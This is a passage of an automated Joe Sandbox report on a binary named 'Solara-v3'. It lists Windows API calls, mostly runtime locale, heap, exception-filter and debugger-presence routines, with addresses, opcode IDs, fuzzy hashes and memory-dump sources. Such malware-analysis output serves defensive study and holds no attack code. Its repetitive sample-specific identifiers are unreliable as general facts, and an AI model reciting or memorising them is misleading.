                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E631737290011AEFCF14DF68D9D49EDBBB8BF09320B14026AE526E3690E731E954DB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C9AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00C98A2A,?,?,00C9AF87,00C98A2A,?,00C9AF58,00C98A2A,?,?,?), ref: 00C9AFD0
                                                                                                                                                                                                                                              • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,3F29B6ED,?,?,?,Function_0002BE94,000000FF), ref: 00C9B0C7
                                                                                                                                                                                                                                                • Part of subcall function 00C9AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00C9AF1B
                                                                                                                                                                                                                                                • Part of subcall function 00C9EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00C98E4A,00C9A2F0), ref: 00C9EFE7
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3627539351-0
                                                                                                                                                                                                                                              • Opcode ID: 1f51ff9c1620dce8b8c5e27274763b8362b6176a21d7287d187e414e525b5cff
                                                                                                                                                                                                                                              • Instruction ID: 46b7fb1250c187389dc6ea0f790a6746c55c9f2dbd7c33cd75878245d89e8f18
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f51ff9c1620dce8b8c5e27274763b8362b6176a21d7287d187e414e525b5cff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE11E772604640ABCF25ABA5ED1AF2E7769EF45B20F00442EF81597AD0CF35ED10DB91
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dd2721888b3ee126636738cf1c3abb7554c2833680e2e6e2fadac2e22a5d0875
                                                                                                                                                                                                                                              • Instruction ID: d38f4ad8f0becaa38a382a66497ceb76efd988950eb63da1afb8c5186c5524ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd2721888b3ee126636738cf1c3abb7554c2833680e2e6e2fadac2e22a5d0875
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4401F5332102165F9B1A8EA8EC81F1A337ABBC2724F258124F92387494DB32DC029750
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3988221542-0
                                                                                                                                                                                                                                              • Opcode ID: 668b0d3f86bb540a948570c563d35f6ea6a20c4c5c54008a778996e897db5942
                                                                                                                                                                                                                                              • Instruction ID: 4a6ede27b8ff15caa8a99c6a47bde1e6c5f6bc4bbb48ab08327e226a83160bc6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 668b0d3f86bb540a948570c563d35f6ea6a20c4c5c54008a778996e897db5942
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C90121767082868FCF059B78F8BD6A8BF20FF96338B2041AFE021854C1CB125964D700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAD2F5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 312c302f71ac46209dadb5ce7405c8772816304e897691440eb05a1128c37ba1
                                                                                                                                                                                                                                              • Instruction ID: 0d11e7d667e33bac7edaf8c40e38fe4b4398e91a7792c8ad6ba89c1431dbb19a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 312c302f71ac46209dadb5ce7405c8772816304e897691440eb05a1128c37ba1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0E931201923679F216A639C05F5A3B68AF83B78B144221FD27D64A0CE30DD00D6A1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C977C6
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00C978DA,00000000), ref: 00C9AF72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 312417170-0
                                                                                                                                                                                                                                              • Opcode ID: 4f0f58b228c546fbfeec8bb9fce2f8a707effdcf9a84e80536083671151ecf03
                                                                                                                                                                                                                                              • Instruction ID: be990abcc7b0e56a13ed809f408405ba1e755ca43c296919cd3de29e213a8af4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f58b228c546fbfeec8bb9fce2f8a707effdcf9a84e80536083671151ecf03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C0128B1C006599BDF04EF94D849B9EBBB4FB44720F004239E81967350E379AA45CAD2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00CADF35,?,?,00CADF35,00000220,?,00000000,?), ref: 00CABF43
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: f505a417f2b58a5af7615197165b1947e2d3682eee6f43737731ac5abe2c79cc
                                                                                                                                                                                                                                              • Instruction ID: 4fa7214f4b67de36b69a3486c6003ad022938af4c21516c8f81beba1e17c10a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f505a417f2b58a5af7615197165b1947e2d3682eee6f43737731ac5abe2c79cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4E0E5391055136FDA202AE69C00B5E76489F43BA8F1C0161FC3D96192DB20DD00D9A4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C9990F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                                                                                                                              • Opcode ID: 727bd6c386a8345a202c3c6b5a05cf13a9a55f7284540b4e5771133ac51543f2
                                                                                                                                                                                                                                              • Instruction ID: 264a14d97c769cc906fee1def5e431dbfc73f75dc42096b9c2f4af7c97556994
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 727bd6c386a8345a202c3c6b5a05cf13a9a55f7284540b4e5771133ac51543f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D05E397050248B8B14BB28E91892E6355EFC8B21356049DE851D7345C7349C028680
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AA0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00CB13BD,?,00000000), ref: 00CB1ADE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB138F
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00CB13CD
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00CB13E0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB1428
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB1443
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C9F8F5
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C9F9C1
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C9F9DA
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C9F9E4
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB15D4
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB161E
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB16E4
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CA7F28
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CA7F32
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00CA7F3F
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00CA00EC
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,3F29B6ED,00C98E30,?,00CBBE77,000000FF,?,00C9FDB4,?,00000000,00000000,?,00C9FDD8,?,00C98E30,?), ref: 00CA00F0
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CB5BB9,?,?,00000008,?,?,00CBBCAB,00000000), ref: 00CB5E8B
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C9F56B
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAD2B4: RtlAllocateHeap.NTDLL(00000008,?,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAD2F5
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00CB21CD
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CB220C
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CB223F
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4087847297-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB1894
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1580,00000001,00000000,?,-00000050,?,00CB1363,00000000,-00000002,00000000,?,00000055,?), ref: 00CB154A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 0246f38231ac3db739bf553480f1811b2de12853b9a4f1b855f82ab8ef24fdd4
                                                                                                                                                                                                                                              • Instruction ID: 2a84d3cda0f93e50b175348606e466dba65474b6d414248f8294ad1126d0346f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0246f38231ac3db739bf553480f1811b2de12853b9a4f1b855f82ab8ef24fdd4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9811E9362007015FDB289F39C8A16FAB791FF80768F58442CE94747B40E771B942D750
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB19B4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: 9d110845021ea57acbc4f43d4e061997946a97b92bc5e4019e5eb95625514f5a
                                                                                                                                                                                                                                              • Instruction ID: d6ce288f9188660e5d775994d6def3dec69fb47908315962a8ce614365af4804
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d110845021ea57acbc4f43d4e061997946a97b92bc5e4019e5eb95625514f5a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7711E032A00206ABDB14AB68CC62AFE73ACEF05714F24417AF912D7141EB38EE05A750
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CB179C,00000000,00000000,?), ref: 00CB1B39
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: e86051361543ce644b6712a6ccb37d6a3b1ff595cddcff0fd96c63f3eebb3e8b
                                                                                                                                                                                                                                              • Instruction ID: 9b437e08d35015415954ef754f7143051854a5bfc531be52f3a66f14af45a6fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e86051361543ce644b6712a6ccb37d6a3b1ff595cddcff0fd96c63f3eebb3e8b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801F472710122ABDB2C5B65CC2ABFA3768EF40758F594478ED16A3180FA74FE41D690
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1840,00000001,?,?,-00000050,?,00CB132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CB181D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 4ceebc9b35973a86c67cb0cf1c6bf48eebfdb6b4a9855632c12e90ef94ae4ab8
                                                                                                                                                                                                                                              • Instruction ID: 001b60b879ac46913e92e6146ce41ace8691e8adeb99a6c2f5e76fa4f9180384
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ceebc9b35973a86c67cb0cf1c6bf48eebfdb6b4a9855632c12e90ef94ae4ab8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F046323003041FCB245F79DC91ABA7B91FF80768F09842CFE058B680C6B29D02D650
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA80E1: EnterCriticalSection.KERNEL32(?,?,00CAC5F8,?,00CC9290,00000008,00CAC4EA,?,?,?), ref: 00CA80F0
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CAD1B0,00000001,00CC9310,0000000C,00CACB11,-00000050), ref: 00CAD1F5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1960,00000001,?,?,?,00CB1385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CB194C
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CA6E33,?,20001004,00000000,00000002,?,?,00CA5D3D), ref: 00CACC49
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00C9F8E2
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(032E4738,032E4738,00000000,7FFFFFFF,?,00CBAACD,032E4738,032E4738,00000000,032E4738,?,?,?,?,032E4738,00000000), ref: 00CBAB88
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CBAC43
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CBACD2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD1D
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD23
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD59
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD5F
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD6F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
